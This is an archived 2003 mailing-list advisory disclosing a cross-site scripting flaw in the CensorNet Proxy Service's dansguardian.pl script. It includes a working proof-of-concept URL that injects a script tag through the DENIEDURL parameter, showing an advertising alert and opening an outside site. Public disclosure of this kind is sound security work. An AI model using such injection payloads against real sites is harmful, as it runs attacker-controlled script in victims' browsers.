|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
CensorNet: Cross Site Scripting Vulnerability
From: Richard Maudsley (maudr001
rbwm.org)
Date: Wed Oct 22 2003 - 06:51:13 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello,
A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.
Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script>
Regards,
Richard Maudsley
- -------------------------------------------------------------------
This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
content of this email please contact abuse
rbwm.org
- -------------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]